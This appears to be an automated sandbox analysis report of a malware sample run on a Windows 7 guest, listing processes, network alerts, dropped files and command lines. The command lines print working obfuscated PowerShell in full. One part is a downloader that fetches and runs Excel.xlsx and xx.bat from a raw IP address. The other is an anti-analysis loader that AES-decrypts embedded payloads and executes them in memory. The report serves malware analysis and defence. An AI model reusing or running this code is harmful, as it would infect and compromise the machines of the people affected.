Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | May 9, 2024, 10:59 a.m. | May 9, 2024, 11:01 a.m. |
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function oYYtmcfgNVALjZ($AMoNCQYGRgLRoU, $yowkcxYklFDKtli){[IO.File]::WriteAllBytes($AMoNCQYGRgLRoU, $yowkcxYklFDKtli)};function oocZbSbPqugD($AMoNCQYGRgLRoU){if($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59872,59880,59880))) -eq $True){rundll32.exe $AMoNCQYGRgLRoU }elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59884,59887,59821))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $AMoNCQYGRgLRoU}elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59881,59887,59877))) -eq $True){misexec /qn /i $AMoNCQYGRgLRoU}else{Start-Process $AMoNCQYGRgLRoU}};function jlAPajKrXnXds($irMBWZFpvuqduX){$hWiCJPXtnbCAfgDIPKdzz = New-Object (iGrhVnKiZYQ @(59850,59873,59888,59818,59859,59873,59870,59839,59880,59877,59873,59882,59888));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$yowkcxYklFDKtli = $hWiCJPXtnbCAfgDIPKdzz.DownloadData($irMBWZFpvuqduX);return $yowkcxYklFDKtli};function iGrhVnKiZYQ($eaILzSbnqJ){$lgMdU=59772;$pkNOUpDlz=$Null;foreach($WtZmnegAvYDwZrJ in $eaILzSbnqJ){$pkNOUpDlz+=[char]($WtZmnegAvYDwZrJ-$lgMdU)};return $pkNOUpDlz};function wwFwRQUTDiTf(){$wPeJapJpGtoAMd = $env:AppData + '\';$ZxSzqAOPdWfCSvt = $wPeJapJpGtoAMd + 'Excel.xlsx';If(Test-Path -Path $ZxSzqAOPdWfCSvt){Invoke-Item $ZxSzqAOPdWfCSvt;}Else{ $VbnfWkgMtzU = jlAPajKrXnXds (iGrhVnKiZYQ @(59876,59888,59888,59884,59830,59819,59819,59821,59829,59823,59818,59822,59822,59822,59818,59829,59826,59818,59821,59824,59823,59830,59827,59822,59828,59827,59819,59841,59892,59871,59873,59880,59818,59892,59880,59887,59892));oYYtmcfgNVALjZ $ZxSzqAOPdWfCSvt $VbnfWkgMtzU;Invoke-Item $ZxSzqAOPdWfCSvt;};$qQjgFPGszJBcNb = $wPeJapJpGtoAMd + 'xx.bat'; if (Test-Path -Path $qQjgFPGszJBcNb){oocZbSbPqugD $qQjgFPGszJBcNb;}Else{ $aiJbTZVrclHZrx = jlAPajKrXnXds (iGrhVnKiZYQ @(59876,59888,59888,59884,59830,59819,59819,59821,59829,59823,59818,59822,59822,59822,59818,59829,59826,59818,59821,59824,59823,59830,59827,59822,59828,59827,59819,59892,59892,59818,59870,59869,59888));oYYtmcfgNVALjZ $qQjgFPGszJBcNb $aiJbTZVrclHZrx;oocZbSbPqugD $qQjgFPGszJBcNb;};;;;}wwFwRQUTDiTf;
2644-
EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
2812 -
-
-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xx.bat';$BMbC='RsHpUesHpUadLsHpUinsHpUesHpUssHpU'.Replace('sHpU', ''),'CCFZsreCFZsatCFZseDCFZsecCFZsrCFZsyCFZspCFZstCFZsorCFZs'.Replace('CFZs', ''),'FrBDpromBDprBBDpraBDprseBDpr6BDpr4SBDprtrBDpriBDprngBDpr'.Replace('BDpr', ''),'ChAmxTanAmxTgAmxTeEAmxTxtAmxTensAmxTiAmxTonAmxT'.Replace('AmxT', ''),'DMtvCecMtvComMtvCprMtvCeMtvCsMtvCsMtvC'.Replace('MtvC', ''),'LCapfoaCapfdCapf'.Replace('Capf', ''),'ISAmunSAmuvokSAmueSAmu'.Replace('SAmu', ''),'MawqArinMwqArowqArduwqArlewqAr'.Replace('wqAr', ''),'GetKwgmCuKwgmrreKwgmntKwgmPKwgmrocKwgmessKwgm'.Replace('Kwgm', ''),'SplMBlVitMBlV'.Replace('MBlV', ''),'ElayXCemayXCeayXCnayXCtayXCAtayXC'.Replace('ayXC', ''),'TVQktranVQktsVQktforVQktmFiVQktnaVQktlVQktBVQktloVQktcVQktkVQkt'.Replace('VQkt', ''),'EnXNnYtXNnYrXNnYyPoXNnYintXNnY'.Replace('XNnY', ''),'ComQwwpyTmQwwomQww'.Replace('mQww', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($BMbC[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function zlGLC($RSWKX){$GVeOl=[System.Security.Cryptography.Aes]::Create();$GVeOl.Mode=[System.Security.Cryptography.CipherMode]::CBC;$GVeOl.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$GVeOl.Key=[System.Convert]::($BMbC[2])('uY6F5j209xASZjaoUU93vCCXVRY+Y6fGH5LCH0uNzYo=');$GVeOl.IV=[System.Convert]::($BMbC[2])('iwvv8vpAhw35q7w8nU7OXw==');$QznTD=$GVeOl.($BMbC[1])();$RHHCU=$QznTD.($BMbC[11])($RSWKX,0,$RSWKX.Length);$QznTD.Dispose();$GVeOl.Dispose();$RHHCU;}function lfrrO($RSWKX){$kKatK=New-Object System.IO.MemoryStream(,$RSWKX);$EyOwi=New-Object System.IO.MemoryStream;$oJtRR=New-Object System.IO.Compression.GZipStream($kKatK,[IO.Compression.CompressionMode]::($BMbC[4]));$oJtRR.($BMbC[13])($EyOwi);$oJtRR.Dispose();$kKatK.Dispose();$EyOwi.Dispose();$EyOwi.ToArray();}$FYWBz=[System.IO.File]::($BMbC[0])([Console]::Title);$QpMEc=lfrrO (zlGLC ([Convert]::($BMbC[2])([System.Linq.Enumerable]::($BMbC[10])($FYWBz, 5).Substring(2))));$IyoFy=lfrrO (zlGLC ([Convert]::($BMbC[2])([System.Linq.Enumerable]::($BMbC[10])($FYWBz, 6).Substring(2))));[System.Reflection.Assembly]::($BMbC[5])([byte[]]$IyoFy).($BMbC[12]).($BMbC[6])($null,$null);[System.Reflection.Assembly]::($BMbC[5])([byte[]]$QpMEc).($BMbC[12]).($BMbC[6])($null,$null); "
2116 -
powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2068
-
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1452
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
193.222.96.143 | Active | Moloch |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 193.222.96.143:7287 -> 192.168.56.101:49167 | 2400036 | ET DROP Spamhaus DROP Listed Traffic Inbound group 37 | Misc Attack |
TCP 192.168.56.101:49163 -> 193.222.96.143:7287 | 2027254 | ET INFO Dotted Quad Host XLSX Request | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\12.0\Registration\{90120000-0030-0000-0000-0000000FF1CE}\DigitalProductID |
file | C:\Users\test22\AppData\Roaming\Excel.xlsx |
file | C:\Users\test22\AppData\Roaming\~$Excel.xlsx |
file | C:\Users\test22\AppData\Roaming\xx.bat |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Roaming.LNK |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Excel.xlsx.LNK |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Roaming.LNK |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Excel.xlsx.LNK |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function oYYtmcfgNVALjZ($AMoNCQYGRgLRoU, $yowkcxYklFDKtli){[IO.File]::WriteAllBytes($AMoNCQYGRgLRoU, $yowkcxYklFDKtli)};function oocZbSbPqugD($AMoNCQYGRgLRoU){if($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59872,59880,59880))) -eq $True){rundll32.exe $AMoNCQYGRgLRoU }elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59884,59887,59821))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $AMoNCQYGRgLRoU}elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59881,59887,59877))) -eq $True){misexec /qn /i $AMoNCQYGRgLRoU}else{Start-Process $AMoNCQYGRgLRoU}};function jlAPajKrXnXds($irMBWZFpvuqduX){$hWiCJPXtnbCAfgDIPKdzz = New-Object (iGrhVnKiZYQ @(59850,59873,59888,59818,59859,59873,59870,59839,59880,59877,59873,59882,59888));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$yowkcxYklFDKtli = $hWiCJPXtnbCAfgDIPKdzz.DownloadData($irMBWZFpvuqduX);return $yowkcxYklFDKtli};function iGrhVnKiZYQ($eaILzSbnqJ){$lgMdU=59772;$pkNOUpDlz=$Null;foreach($WtZmnegAvYDwZrJ in $eaILzSbnqJ){$pkNOUpDlz+=[char]($WtZmnegAvYDwZrJ-$lgMdU)};return $pkNOUpDlz};function wwFwRQUTDiTf(){$wPeJapJpGtoAMd = $env:AppData + '\';$ZxSzqAOPdWfCSvt = $wPeJapJpGtoAMd + 'Excel.xlsx';If(Test-Path -Path $ZxSzqAOPdWfCSvt){Invoke-Item $ZxSzqAOPdWfCSvt;}Else{ $VbnfWkgMtzU = jlAPajKrXnXds (iGrhVnKiZYQ @(59876,59888,59888,59884,59830,59819,59819,59821,59829,59823,59818,59822,59822,59822,59818,59829,59826,59818,59821,59824,59823,59830,59827,59822,59828,59827,59819,59841,59892,59871,59873,59880,59818,59892,59880,59887,59892));oYYtmcfgNVALjZ $ZxSzqAOPdWfCSvt $VbnfWkgMtzU;Invoke-Item $ZxSzqAOPdWfCSvt;};$qQjgFPGszJBcNb = $wPeJapJpGtoAMd + 'xx.bat'; if (Test-Path -Path $qQjgFPGszJBcNb){oocZbSbPqugD $qQjgFPGszJBcNb;}Else{ $aiJbTZVrclHZrx = jlAPajKrXnXds (iGrhVnKiZYQ @(59876,59888,59888,59884,59830,59819,59819,59821,59829,59823,59818,59822,59822,59822,59818,59829,59826,59818,59821,59824,59823,59830,59827,59822,59828,59827,59819,59892,59892,59818,59870,59869,59888));oYYtmcfgNVALjZ $qQjgFPGszJBcNb $aiJbTZVrclHZrx;oocZbSbPqugD $qQjgFPGszJBcNb;};;;;}wwFwRQUTDiTf; |
cmdline | powershell.exe -ExecutionPolicy UnRestricted function oYYtmcfgNVALjZ($AMoNCQYGRgLRoU, $yowkcxYklFDKtli){[IO.File]::WriteAllBytes($AMoNCQYGRgLRoU, $yowkcxYklFDKtli)};function oocZbSbPqugD($AMoNCQYGRgLRoU){if($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59872,59880,59880))) -eq $True){rundll32.exe $AMoNCQYGRgLRoU }elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59884,59887,59821))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $AMoNCQYGRgLRoU}elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59881,59887,59877))) -eq $True){misexec /qn /i $AMoNCQYGRgLRoU}else{Start-Process $AMoNCQYGRgLRoU}};function jlAPajKrXnXds($irMBWZFpvuqduX){$hWiCJPXtnbCAfgDIPKdzz = New-Object (iGrhVnKiZYQ @(59850,59873,59888,59818,59859,59873,59870,59839,59880,59877,59873,59882,59888));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$yowkcxYklFDKtli = $hWiCJPXtnbCAfgDIPKdzz.DownloadData($irMBWZFpvuqduX);return $yowkcxYklFDKtli};function iGrhVnKiZYQ($eaILzSbnqJ){$lgMdU=59772;$pkNOUpDlz=$Null;foreach($WtZmnegAvYDwZrJ in $eaILzSbnqJ){$pkNOUpDlz+=[char]($WtZmnegAvYDwZrJ-$lgMdU)};return $pkNOUpDlz};function wwFwRQUTDiTf(){$wPeJapJpGtoAMd = $env:AppData + '\';$ZxSzqAOPdWfCSvt = $wPeJapJpGtoAMd + 'Excel.xlsx';If(Test-Path -Path $ZxSzqAOPdWfCSvt){Invoke-Item $ZxSzqAOPdWfCSvt;}Else{ $VbnfWkgMtzU = jlAPajKrXnXds (iGrhVnKiZYQ @(59876,59888,59888,59884,59830,59819,59819,59821,59829,59823,59818,59822,59822,59822,59818,59829,59826,59818,59821,59824,59823,59830,59827,59822,59828,59827,59819,59841,59892,59871,59873,59880,59818,59892,59880,59887,59892));oYYtmcfgNVALjZ $ZxSzqAOPdWfCSvt $VbnfWkgMtzU;Invoke-Item $ZxSzqAOPdWfCSvt;};$qQjgFPGszJBcNb = $wPeJapJpGtoAMd + 'xx.bat'; if (Test-Path -Path $qQjgFPGszJBcNb){oocZbSbPqugD $qQjgFPGszJBcNb;}Else{ $aiJbTZVrclHZrx = jlAPajKrXnXds (iGrhVnKiZYQ @(59876,59888,59888,59884,59830,59819,59819,59821,59829,59823,59818,59822,59822,59822,59818,59829,59826,59818,59821,59824,59823,59830,59827,59822,59828,59827,59819,59892,59892,59818,59870,59869,59888));oYYtmcfgNVALjZ $qQjgFPGszJBcNb $aiJbTZVrclHZrx;oocZbSbPqugD $qQjgFPGszJBcNb;};;;;}wwFwRQUTDiTf; |
cmdline | C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Roaming\xx.bat" |
cmdline | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xx.bat';$BMbC='RsHpUesHpUadLsHpUinsHpUesHpUssHpU'.Replace('sHpU', ''),'CCFZsreCFZsatCFZseDCFZsecCFZsrCFZsyCFZspCFZstCFZsorCFZs'.Replace('CFZs', ''),'FrBDpromBDprBBDpraBDprseBDpr6BDpr4SBDprtrBDpriBDprngBDpr'.Replace('BDpr', ''),'ChAmxTanAmxTgAmxTeEAmxTxtAmxTensAmxTiAmxTonAmxT'.Replace('AmxT', ''),'DMtvCecMtvComMtvCprMtvCeMtvCsMtvCsMtvC'.Replace('MtvC', ''),'LCapfoaCapfdCapf'.Replace('Capf', ''),'ISAmunSAmuvokSAmueSAmu'.Replace('SAmu', ''),'MawqArinMwqArowqArduwqArlewqAr'.Replace('wqAr', ''),'GetKwgmCuKwgmrreKwgmntKwgmPKwgmrocKwgmessKwgm'.Replace('Kwgm', ''),'SplMBlVitMBlV'.Replace('MBlV', ''),'ElayXCemayXCeayXCnayXCtayXCAtayXC'.Replace('ayXC', ''),'TVQktranVQktsVQktforVQktmFiVQktnaVQktlVQktBVQktloVQktcVQktkVQkt'.Replace('VQkt', ''),'EnXNnYtXNnYrXNnYyPoXNnYintXNnY'.Replace('XNnY', ''),'ComQwwpyTmQwwomQww'.Replace('mQww', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($BMbC[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function zlGLC($RSWKX){$GVeOl=[System.Security.Cryptography.Aes]::Create();$GVeOl.Mode=[System.Security.Cryptography.CipherMode]::CBC;$GVeOl.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$GVeOl.Key=[System.Convert]::($BMbC[2])('uY6F5j209xASZjaoUU93vCCXVRY+Y6fGH5LCH0uNzYo=');$GVeOl.IV=[System.Convert]::($BMbC[2])('iwvv8vpAhw35q7w8nU7OXw==');$QznTD=$GVeOl.($BMbC[1])();$RHHCU=$QznTD.($BMbC[11])($RSWKX,0,$RSWKX.Length);$QznTD.Dispose();$GVeOl.Dispose();$RHHCU;}function lfrrO($RSWKX){$kKatK=New-Object System.IO.MemoryStream(,$RSWKX);$EyOwi=New-Object System.IO.MemoryStream;$oJtRR=New-Object System.IO.Compression.GZipStream($kKatK,[IO.Compression.CompressionMode]::($BMbC[4]));$oJtRR.($BMbC[13])($EyOwi);$oJtRR.Dispose();$kKatK.Dispose();$EyOwi.Dispose();$EyOwi.ToArray();}$FYWBz=[System.IO.File]::($BMbC[0])([Console]::Title);$QpMEc=lfrrO (zlGLC ([Convert]::($BMbC[2])([System.Linq.Enumerable]::($BMbC[10])($FYWBz, 5).Substring(2))));$IyoFy=lfrrO (zlGLC ([Convert]::($BMbC[2])([System.Linq.Enumerable]::($BMbC[10])($FYWBz, 6).Substring(2))));[System.Reflection.Assembly]::($BMbC[5])([byte[]]$IyoFy).($BMbC[12]).($BMbC[6])($null,$null);[System.Reflection.Assembly]::($BMbC[5])([byte[]]$QpMEc).($BMbC[12]).($BMbC[6])($null,$null); " |
Data received | HTTP/1.1 200 OK |
Data received | Content-Length: 66832 Content-Type: application/octet-stream Connection:close @echo off set "JbUhLV=seBgrIot BgrIoTBgrIoxkJBgrIo=BgrIo1 BgrIo&&BgrIo stBgrIoarBgrIot BgrIo""BgrIo /BgrIomiBgrIon BgrIo" set "CTregK=&&BgrIo BgrIoeBgrIoxiBgrIotBgrIo" set "cYogot=notBgrIo BgrIodeBgrIofinBgrIoedBgrIo BgrIoTBgrIoxkJBgrIo if %cYogot:BgrIo=% (%JbUhLV:BgrIo=%%0 %CTregK:BgrIo=%) ::tkOZnOPbY7Nvcd92FR2B4AeKWaACXHx8ZX1Vk2X265/8qc+cn36MPymHvd3YWnzH1zG/+Jv5zWE05da5KZwsW6PfiG8au1bJ1DKJiFnzuedc/qoLxmbWDgwWBS54iEYQPEU1zQo2O1Ri2OWw/WYfH1r50dL5e1Bx4nrYmd9+yVXt3VsunWn5KL6Yjoj2DlwoKswvCmE09haF0j0s8B0QgUsa2E08Wy08LA+Ka2Cc+HyuZl+rzT3ObKIfEYvHoNOdcPSRuT594iKAofwvI4HJFq0KkBDjE1PYjX2dQlSGIHjn2nZLL6X1E16ySH1bjV71c3eYsAALZEpBzEf8l71fNNzapka5CHqiD1pQjn5tPYnopsP7rpRtVh0HV34D027h2wLnCSfVKVPKi/ImdiFNzZ+j9ip1QC4a+qlISsfp/Zp4+MLULKtp5H756UwC41E9d1KCa2iktHlQ23kBcE/Tpd0MtWsiADZPNFwVyRmkavwElhwbTJ5zX6rDrhaV4j1MxFXTbztXF2r2zznrtA/Nsm03l5FSoMEErFtUAZhsLdiZSal/SpvObmthm1iikgNN14uiDugjR17x/dZwtyNm+pCSs0zb6LNGF9aOnObok2Qm5XXvwUP7x8bPOazf2NsseupLSUpVKUqPuUg1MJD1IY/D8w75RksK6UdvhxqX0W5XjBR+VNOYShshRs//ExxUIhN1xRJuPiDM72JN9sXytVIJIX9UWS7fXkEnlSRC4Du6y8y6j/rGKKmTlxCFqNYEGcouUv+vKKh21lZjxyG0Sb7y5/UssuFJ8skOieacgWmLCGpi/F2lnQ2W3LK/4MjNDEMbFBv2oScpbN/3reZBb2xuuSSA2rgYp3YWEW1Hi2lxEOezgonimtDBP8Zjv9zWjlIuDd3cC2OuRCjBJCEdotnZrPRl4c7BrlO2aHn76zNulbXdjM7QDWLiO5C9Ry2ItiPYQWuhwu8fJRABeyhqaMdVzfCJfxjWxxAvDKEJHlMWeqxtEURgn9yOmcW1gWGiBwDZ+KoWdyGEjKxApCcxG4KKKEfDdFLHs4SfxRXBbwATVMi1vW0Zl4s4+Us+PE+SEKLw5Q5+beEBpXTuWJgRVFm87PMoWOZFO48fiW5e7pOSVtzPo1q1uXchl2nvZz9hNZAsmZocki5t3OQsY/xMnNTa8dTUZBetKtZE/cD/KALao0PFi3Wx33xHRWGmDVk5MW8O6wr+w4FDQ2rOtGIr2S0YFH3SqBtlQoSpczO96Je5ygNLcoYH53oV+W07SJCh727ZgcYb2v0EIjK/slkSO3lPcuLjfB0p4R+xTWe2DYT5uERPKrWTlxS8zNZ8oEUr2c5/YbxQLSEtzlwcPyYua+4+iMaJxZORVygMUZC6K4gCxLENIVdUfMsivljvyjxkIAI2cv5ol1BXCeuXpIWVGSfEG11/eYeCJI6nRYv7IJfI3t/MTkI8uNuq5aEo8ibjozWCTZL4rZ3PIHPCnsemzstwOwDMpRNyQwLg5HrBCq06vl+wC3Ebul0QN5qVzk8DU4V0/LHt+L06h1ZSOE4fvMtAZC8XqgpzfbDXrm+Mer0zwET5iLfdWYhciUWMrX2I3sD3UHO214vGfuwYg/LFaOCys9MoWDZ0UhNRwzvKZWqAmjdujoFcwgdgDZYXMFYmPZ5TdGz5t8hWqXxAKlRxFw0EBpLZbSYRWkLoLSgmmfQPms43h/UV7LmBGeGD7sO/smyAdXXRK3fpbSHUQZaZk |
Data received | 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 |
Data received | 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 |
